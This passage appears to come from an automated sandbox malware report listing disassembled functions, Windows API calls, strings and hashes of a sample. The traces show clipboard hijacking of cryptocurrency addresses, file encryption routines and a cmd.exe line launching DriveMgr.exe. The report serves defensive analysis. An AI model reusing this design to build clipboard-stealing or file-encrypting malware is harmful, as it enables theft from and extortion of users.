OpenClipboard.USER32(00000000), ref: 009AFC64
EmptyClipboard.USER32 ref: 009AFC6E
SetClipboardData.USER32(00000001,?), ref: 009AFC7A
CloseClipboard.USER32 ref: 009AFC80

Strings

0, xrefs: 009AF994
cosmos, xrefs: 009AFB0D
addr, xrefs: 009AF866
bitcoincash:, xrefs: 009AF8D3
addr, xrefs: 009AFB3B
cosmos, xrefs: 009AF83C
bnb, xrefs: 009AFB86
bitcoincash, xrefs: 009AFAF1
band, xrefs: 009AFBA2
bitcoincash:, xrefs: 009AF80F

Memory Dump Source

Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd

Similarity

API ID: Clipboard$Global$strlen$AllocCloseDataEmptyLockOpenUnlockisalphaisdigitmemcpy
String ID: 0$addr$addr$band$bitcoincash$bitcoincash:$bitcoincash:$bnb$cosmos$cosmos
API String ID: 2251388001-1408303297
Opcode ID: 280ef08ef635ef434f16e9f85484867526d523f1ed5436bed0810753667d160e
Instruction ID: e0cb268d0d00dd85c8ec08dce98af93600380b9849ea539e03ac22394c2e1d98
Opcode Fuzzy Hash: 280ef08ef635ef434f16e9f85484867526d523f1ed5436bed0810753667d160e
Instruction Fuzzy Hash: 6E123075A04258ABCB14CF94C5F45BE7FBAAF43366F6480A9D8959F215C7389E80CBC0

Uniqueness

Uniqueness Score: -1.00%

Function 009AF010 Relevance: 39.0, APIs: 12, Strings: 10, Instructions: 476clipboardmemorystringCOMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 009AF021
iswalpha.MSVCRT ref: 009AF300
iswdigit.MSVCRT ref: 009AF317
lstrlenW.KERNEL32(009AFD53), ref: 009AF5C9
GlobalAlloc.KERNEL32(00002002,?), ref: 009AF5DE
GlobalLock.KERNEL32(?), ref: 009AF5EB
memcpy.MSVCRT ref: 009AF604
GlobalUnlock.KERNEL32(?), ref: 009AF610
OpenClipboard.USER32(00000000), ref: 009AF618
EmptyClipboard.USER32 ref: 009AF622
SetClipboardData.USER32(0000000D,?), ref: 009AF62E
CloseClipboard.USER32 ref: 009AF634

Strings

cosmos, xrefs: 009AF4C2
addr, xrefs: 009AF216
cosmos, xrefs: 009AF1EC
bitcoincash, xrefs: 009AF4A6
bitcoincash:, xrefs: 009AF283
0, xrefs: 009AF349
bnb, xrefs: 009AF53B
bitcoincash:, xrefs: 009AF1BF
band, xrefs: 009AF557
addr, xrefs: 009AF4F0

Memory Dump Source

Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd

Similarity

API ID: Clipboard$Global$AllocCloseDataEmptyLockOpenUnlockiswalphaiswdigitlstrlenmemcpywcslen
String ID: 0$addr$addr$band$bitcoincash$bitcoincash:$bitcoincash:$bnb$cosmos$cosmos
API String ID: 2964143298-1408303297
Opcode ID: 01932c4524f4fd1117cd318260d2d67de721cd10cfaa85bd4f71c489a9e076ec
Instruction ID: 62fd6264e1e2e508e6a405aa96eb707e1c0cf40e85af0510bc6e659d3fcf2e45
Opcode Fuzzy Hash: 01932c4524f4fd1117cd318260d2d67de721cd10cfaa85bd4f71c489a9e076ec
Instruction Fuzzy Hash: 96127670A04219EBCF688F80C5A45BD7BB6AF837A5F608469F8859B250D734DEC1DBD0

Uniqueness

Uniqueness Score: -1.00%

Function 009AFE60 Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 178
filememoryencryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptImportKey.ADVAPI32(015379A0,009B5940,00000214,00000000,00000000,00000000,?,?,?,?,?,?,?,?,009B0750), ref: 009AFE8A
CreateFileW.KERNEL32(009B0750,C0000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,?,009B0750), ref: 009AFEAB
GetFileSize.KERNEL32(000000FF,00000000), ref: 009AFEC4
CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00000000,00000000), ref: 009AFEE5
MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 009AFF04
CryptCreateHash.ADVAPI32(015379A0,00008004,00000000,00000000,?), ref: 009AFF56
GetProcessHeap.KERNEL32(00000000,00000000), ref: 009AFF8D
HeapAlloc.KERNEL32(00000000), ref: 009AFF94

Part of subcall function 009AFD80: memcpy.MSVCRT ref: 009AFDDF
Part of subcall function 009AFD80: memcpy.MSVCRT ref: 009AFDF3
Part of subcall function 009AFD80: CryptImportKey.ADVAPI32(015379A0,00000008,0000001C,00000000,00000000,00000000), ref: 009AFE17
Part of subcall function 009AFD80: CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,?,?), ref: 009AFE3D
Part of subcall function 009AFD80: CryptDestroyKey.ADVAPI32(00000000), ref: 009AFE50

CryptHashData.ADVAPI32(?,00000000,00000000,00000000), ref: 009AFFD4
CryptVerifySignatureA.ADVAPI32(?,?,?,00000000,00000000,00000000), ref: 009AFFF5
memcpy.MSVCRT ref: 009B000F
GetProcessHeap.KERNEL32(00000000,00000000), ref: 009B001D
HeapFree.KERNEL32(00000000), ref: 009B0024
UnmapViewOfFile.KERNEL32(00000000), ref: 009B002E
CloseHandle.KERNEL32(00000000), ref: 009B0038
SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000000), ref: 009B0052
SetEndOfFile.KERNEL32(000000FF), ref: 009B005C
CloseHandle.KERNEL32(000000FF), ref: 009B0066
CryptDestroyKey.ADVAPI32(00000000), ref: 009B0070

Strings

NGS!, xrefs: 009AFF1A

Memory Dump Source

Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd

Similarity

API ID: Crypt$File$Heap$Creatememcpy$CloseDestroyHandleHashImportProcessView$AllocDataEncryptFreeMappingPointerSignatureSizeUnmapVerify
String ID: NGS!
API String ID: 1316431928-4070929822
Opcode ID: bf2f8dd8b0acd37f26faf0ee91cf8f8ca7b19b755bc58ec764833ad217e0c5f4
Instruction ID: d09e838bce7eb934395ec5a333996112a4aa228ec9b9d0bb6f7190609960085b
Opcode Fuzzy Hash: bf2f8dd8b0acd37f26faf0ee91cf8f8ca7b19b755bc58ec764833ad217e0c5f4
Instruction Fuzzy Hash: 35613F75A14209AFDB14EFE4DE49FAFB7B9BB88710F108548F605B7280C775A940DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 009B09F0 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 85
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryW.KERNEL32(009B0F9D,00000000), ref: 009B09FF
wsprintfW.USER32 ref: 009B0A15
FindFirstFileW.KERNEL32(?,?), ref: 009B0A2C
lstrcmpW.KERNEL32(?,009B7048), ref: 009B0A51
lstrcmpW.KERNEL32(?,009B704C), ref: 009B0A67
wsprintfW.USER32 ref: 009B0A8A
wsprintfW.USER32 ref: 009B0AAA
MoveFileExW.KERNEL32(?,?,00000009), ref: 009B0AE6
FindNextFileW.KERNEL32(000000FF,?), ref: 009B0AFA
FindClose.KERNEL32(000000FF), ref: 009B0B0F
RemoveDirectoryW.KERNEL32(?), ref: 009B0B19

Strings

%s\%s, xrefs: 009B0A7E
%s\%s, xrefs: 009B0A9E
%s\*, xrefs: 009B0A09

Memory Dump Source

Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd

Similarity

API ID: FileFindwsprintf$Directorylstrcmp$CloseCreateFirstMoveNextRemove
String ID: %s\%s$%s\%s$%s\*
API String ID: 92872011-445461498
Opcode ID: e9048740669fa763a96d7df751a3a8b79a219541095cacd9a9b7993941517f93
Instruction ID: 964cabf01bb98f5bf13e7cfed0767a865dbd4a81beda08e06ca34c4da5042c33
Opcode Fuzzy Hash: e9048740669fa763a96d7df751a3a8b79a219541095cacd9a9b7993941517f93
Instruction Fuzzy Hash: 0A3196B55147189FCB10EBA4DD88FEA737CBB84321F408788F60992141EB30DA44CF94

Uniqueness

Uniqueness Score: -1.00%

Function 009A8E30 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 120networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(00000002,00000001,00000006), ref: 009A8E40
setsockopt.WS2_32(00000000,0000FFFF,00000004,00000001,00000004), ref: 009A8E73
htons.WS2_32(00000000), ref: 009A8E8C
htonl.WS2_32(7F000001), ref: 009A8EA4
bind.WS2_32(00000000,?,00000010), ref: 009A8EB9
listen.WS2_32(00000000,00000064), ref: 009A8ED0
getsockname.WS2_32(00000000,?,00000010), ref: 009A8EF4

Part of subcall function 009A2100: memmove.MSVCRT ref: 009A210F

htons.WS2_32(?), ref: 009A8F2D
htons.WS2_32(?), ref: 009A8F56
closesocket.WS2_32(00000000), ref: 009A8FB6

Strings

http://127.0.0.1:%hu, xrefs: 009A8F1B
127.0.0.1:%hu, xrefs: 009A8F08

Memory Dump Source

Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd

Similarity

API ID: htons$bindclosesocketgetsocknamehtonllistenmemmovesetsockoptsocket
String ID: 127.0.0.1:%hu$http://127.0.0.1:%hu
API String ID: 1977552280-2042925195
Opcode ID: 23926f9b41b2e7e8f6b612ddbd7183bb62599e3425086346f3cbe9198c31ad11
Instruction ID: 6c3a73292dc7561bf0aff66f8963e5cf7acb267610f6d4505f1e977d8f3d2e08
Opcode Fuzzy Hash: 23926f9b41b2e7e8f6b612ddbd7183bb62599e3425086346f3cbe9198c31ad11
Instruction Fuzzy Hash: 0541A2B1A34308AFDB10DFA0DE49FBE7779AF44711F008608F6519A2D1E7B19904EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 009AFCD0 Relevance: 13.5, APIs: 9, Instructions: 47clipboardsleepCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(00000000), ref: 009AFCD8
GetClipboardData.USER32(00000001), ref: 009AFCE4
GlobalLock.KERNEL32(00000000), ref: 009AFCF7
GlobalUnlock.KERNEL32(00000000), ref: 009AFD0A
GetClipboardData.USER32(0000000D), ref: 009AFD1E
GlobalLock.KERNEL32(00000000), ref: 009AFD31
GlobalUnlock.KERNEL32(00000000), ref: 009AFD44
CloseClipboard.USER32 ref: 009AFD56
Sleep.KERNEL32(000000C8), ref: 009AFD61

Memory Dump Source

Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd

Similarity

API ID: ClipboardGlobal$DataLockUnlock$CloseOpenSleep
String ID:
API String ID: 4265195717-0
Opcode ID: 301be675a4762150529b67da1ede8732fee11c3cd164cc40cc34c1843e824d30
Instruction ID: e32cf6586aca5ebf910fa2ba79be3873391358b7eb2759f37474980878d6e5cd
Opcode Fuzzy Hash: 301be675a4762150529b67da1ede8732fee11c3cd164cc40cc34c1843e824d30
Instruction Fuzzy Hash: 3E11A1B4904308EFDB00FFF0EA4DB8D7BB8AF46311F144664E506972A0D7348A84EB90

Uniqueness

Uniqueness Score: -1.00%

Function 009A2120 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 78encryptionCOMMON

Download Yara Rule

APIs

Part of subcall function 009A2100: memmove.MSVCRT ref: 009A210F

memmove.MSVCRT ref: 009A2194
CryptAcquireContextA.ADVAPI32(009BA014,00000000,?,0000000D,F0000000), ref: 009A21DE
CryptAcquireContextA.ADVAPI32(009BA11C,00000000,?,00000018,F0000000), ref: 009A21FA
CryptReleaseContext.ADVAPI32(?,00000000), ref: 009A2223
CryptReleaseContext.ADVAPI32(?,00000000), ref: 009A223C

Strings

Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 009A2148
Microsoft Enhanced DSS and Diffie-Hellman Cryptographic Provider, xrefs: 009A215B

Memory Dump Source

Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd

Similarity

API ID: ContextCrypt$AcquireReleasememmove
String ID: Microsoft Enhanced DSS and Diffie-Hellman Cryptographic Provider$Microsoft Enhanced RSA and AES Cryptographic Provider
API String ID: 2654783079-2824478982
Opcode ID: fe0537fdb452e675ec7a406bd0f20d27d123ad4dc3aafc57e4d9f0099345da87
Instruction ID: 08799e8c943f12a32dc711dc916bf75c66e4598123f35bbd1e7c32635d694798
Opcode Fuzzy Hash: fe0537fdb452e675ec7a406bd0f20d27d123ad4dc3aafc57e4d9f0099345da87
Instruction Fuzzy Hash: E4210D74B8C3046AEB60B758AD17FE977245BB3B14F044154FA44651C2EAF1164C97E3

Uniqueness

Uniqueness Score: -1.00%

Function 009A2B60 Relevance: 7.6, APIs: 5, Instructions: 87encryptionCOMMON

Download Yara Rule

APIs

memmove.MSVCRT ref: 009A2BC6
memmove.MSVCRT ref: 009A2BE1

Part of subcall function 009A22B0: CryptGenRandom.ADVAPI32(?,009A2BFD,009AA356,?,009A2BFD,009AA356,00000080), ref: 009A22C2

CryptImportKey.ADVAPI32(?,009AA466,00000190,00000000,00000001,?), ref: 009A2C1F
CryptExportKey.ADVAPI32(?,00000000,00000006,00000000,?,00000290), ref: 009A2C45
CryptDestroyKey.ADVAPI32(?), ref: 009A2C79

Memory Dump Source

Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd

Similarity

API ID: Crypt$memmove$DestroyExportImportRandom
String ID:
API String ID: 2808701524-0
Opcode ID: 97bd3c55830984941563fa4decd0bcbad362e322591b91f3403e50d1e0aed37c
Instruction ID: d04da4034cd9cde2158e3821292f157c781ebc66b4fda824890c22acf615b529
Opcode Fuzzy Hash: 97bd3c55830984941563fa4decd0bcbad362e322591b91f3403e50d1e0aed37c
Instruction Fuzzy Hash: 4531D374600208AFEB10DF64CC86FDA7B75AF95714F04C188FA486B2C2DA75EA848BD5

Uniqueness

Uniqueness Score: -1.00%

Function 009AFD80 Relevance: 7.6, APIs: 5, Instructions: 79encryptionCOMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 009AFDDF
memcpy.MSVCRT ref: 009AFDF3
CryptImportKey.ADVAPI32(015379A0,00000008,0000001C,00000000,00000000,00000000), ref: 009AFE17
CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,?,?), ref: 009AFE3D
CryptDestroyKey.ADVAPI32(00000000), ref: 009AFE50

Memory Dump Source

Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd

Similarity

API ID: Crypt$memcpy$DestroyEncryptImport
String ID:
API String ID: 774555595-0
Opcode ID: 9f821606d236ac1f72a7ee2bf2616eeeb4fe106cdf5724cdc3337573ff5902ce
Instruction ID: ec2a976c3d458394c8dbc897e5b6bf7c3c475280e214f8d80133055ac72380a6
Opcode Fuzzy Hash: 9f821606d236ac1f72a7ee2bf2616eeeb4fe106cdf5724cdc3337573ff5902ce
Instruction Fuzzy Hash: 083149B1D14209EFDB00CFE8C941BEEBBB4AF48700F008159EA19B7280D7749A04DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 009A2680 Relevance: 7.6, APIs: 5, Instructions: 77encryptionCOMMON

Download Yara Rule

APIs

memmove.MSVCRT ref: 009A26B0
CryptImportKey.ADVAPI32(?,00000008,0000001C,00000000,00000000,?), ref: 009A26CD
CryptSetKeyParam.ADVAPI32(?,00000004,00000002,00000000), ref: 009A26F0
memmove.MSVCRT ref: 009A270D
CryptDestroyKey.ADVAPI32(?,?,00000004,00000002,00000000), ref: 009A274F

Memory Dump Source

Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd

Similarity

API ID: Crypt$memmove$DestroyImportParam
String ID:
API String ID: 4072243228-0
Opcode ID: 430c5801c87089e0e2858298fb4256053efd360186146b5881fbe49fd5c90600
Instruction ID: 4eb32af77c95339b645258431ea0c523012d66e0cb7a665cdae07111d0c63b9a
Opcode Fuzzy Hash: 430c5801c87089e0e2858298fb4256053efd360186146b5881fbe49fd5c90600
Instruction Fuzzy Hash: 1F21A374A54348ABEB10DFA4CC45FEE7BB8AF99300F048508F9496B281D775EA44DBE1

Uniqueness

Uniqueness Score: -1.00%

Function 009A2C90 Relevance: 6.1, APIs: 4, Instructions: 63encryptionCOMMON

Download Yara Rule

APIs

memmove.MSVCRT ref: 009A2CB0
CryptImportKey.ADVAPI32(?,?,00000190,00000000,00000001,?), ref: 009A2CED
CryptExportKey.ADVAPI32(?,00000000,00000006,00000000,?,00000290), ref: 009A2D1C
CryptDestroyKey.ADVAPI32(?), ref: 009A2D5D

Memory Dump Source

Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd

Similarity

API ID: Crypt$DestroyExportImportmemmove
String ID:
API String ID: 1806151904-0
Opcode ID: a88ffb5ff215d3a97cdc0168d96815dfefa2d5b2803c5a7a13f0bb9b77c01302
Instruction ID: b636894780f6662848ab557b7e435dd029afe4537d8d0bc0cd19bb92bef39238
Opcode Fuzzy Hash: a88ffb5ff215d3a97cdc0168d96815dfefa2d5b2803c5a7a13f0bb9b77c01302
Instruction Fuzzy Hash: 01219671A106186FEB30DB64DC4AFEA7778AF4A701F0442C8F60DAA1C1D6709B848FA4

Uniqueness

Uniqueness Score: -1.00%

Function 009A29F0 Relevance: 6.0, APIs: 4, Instructions: 43encryptionCOMMON

Download Yara Rule

APIs

CryptHashData.ADVAPI32(000001FD,00000000,?,00000000,000001FD), ref: 009A2A08
CryptDuplicateHash.ADVAPI32(000000FF,00000000,00000000,000000FF), ref: 009A2A1E
CryptGetHashParam.ADVAPI32(000000FF,00000002,?,?,00000000), ref: 009A2A38
CryptDestroyHash.ADVAPI32(000000FF), ref: 009A2A4B

Memory Dump Source

Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd

Similarity

API ID: CryptHash$DataDestroyDuplicateParam
String ID:
API String ID: 1241924263-0
Opcode ID: 1a4e95e64d694122503c9ae5d91bcff136f578f46d33b44b67a1ebf25472f71f
Instruction ID: 48cfeb7e1aeace739a35ece8c48e83b86374731ab643d2e34f436b4122a4d19d
Opcode Fuzzy Hash: 1a4e95e64d694122503c9ae5d91bcff136f578f46d33b44b67a1ebf25472f71f
Instruction Fuzzy Hash: 1B014B79654208BBDB10DFA4DD46FAF7BB9AB49700F008258FE09DB280D671DA00DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 009B0930 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 78comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(009B77A4,00000000,00000017,009B7784,00000008,shell32.dll,00000008), ref: 009B0948

Strings

%windir%\system32\cmd.exe, xrefs: 009B0956
/c start __ & __\DriveMgr.exe & exit, xrefs: 009B098F

Memory Dump Source

Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd

Similarity

API ID: CreateInstance
String ID: %windir%\system32\cmd.exe$/c start __ & __\DriveMgr.exe & exit
API String ID: 542301482-2643104863
Opcode ID: 6a9616e3886c0c9b6f41a448b8febad325717910a0ebf9b2820558e90fd841c0
Instruction ID: 51c101e78886b79c1f12c0ab8106d2c7265e1ccf74e5dcb62d49f2f7cfa51d78
Opcode Fuzzy Hash: 6a9616e3886c0c9b6f41a448b8febad325717910a0ebf9b2820558e90fd841c0
Instruction Fuzzy Hash: EF21E879700109EFC704DF98D981D9EB3B9AF8C704F204298E6099B3A0DA71BE41DB90

Uniqueness

Uniqueness Score: -1.00%

Function 009A2420 Relevance: 4.6, APIs: 3, Instructions: 50encryptionCOMMON

Download Yara Rule

APIs

CryptImportKey.ADVAPI32(?,558DF345,?,00000000,00000040,?,009A254A,?,009A2593), ref: 009A2446
CryptGetKeyParam.ADVAPI32(00000004,00000009,?,00000004,00000000,?,00000000,00000040,?,009A254A,?), ref: 009A2469
CryptDestroyKey.ADVAPI32(00000000,?,00000000,00000040,?,009A254A,?), ref: 009A248F

Memory Dump Source

Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd

Similarity

API ID: Crypt$DestroyImportParam
String ID:
API String ID: 4196615532-0
Opcode ID: 3441bc6fad306d026f785a475d61cd584a30a8aabe0d264bfcd5f0c006d51a69
Instruction ID: 4311cbc9953dde1831638d9c94ad8bc1237b8c41afcbcd44b0c61c74f28721eb
Opcode Fuzzy Hash: 3441bc6fad306d026f785a475d61cd584a30a8aabe0d264bfcd5f0c006d51a69
Instruction Fuzzy Hash: 56118274714208BFDB00DFA4C995FAEBBB9AB49310F008288F945DB290D6309A00DBE1

Uniqueness

Uniqueness Score: -1.00%

Function 009A2970 Relevance: 4.5, APIs: 3, Instructions: 47encryptionCOMMON

Download Yara Rule

APIs

CryptCreateHash.ADVAPI32(?,?,00000000,00000000,00000000,009AA487,?,009A2A8B,009AA487,?,00000000,00000000,?,009AA487), ref: 009A298B
CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 009A29B1
CryptDestroyHash.ADVAPI32(00000000,?,009A2A8B), ref: 009A29D4

Memory Dump Source

Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd

Similarity

API ID: CryptHash$CreateDataDestroy
String ID:
API String ID: 1679088875-0
Opcode ID: c669883480d9615a6f7f3f36e4d22063f71dda041f24a60eec299d2b81bc150b
Instruction ID: 377400cfd5f3cad2bace80d9662fbb3e1313bed86f5fb0c936d76a65416d23c9
Opcode Fuzzy Hash: c669883480d9615a6f7f3f36e4d22063f71dda041f24a60eec299d2b81bc150b
Instruction Fuzzy Hash: A0118070648349AFDB14CFA8D954BAF7BA8AB4A704F044248F949CB280C276D945CBE1

Uniqueness

Uniqueness Score: -1.00%

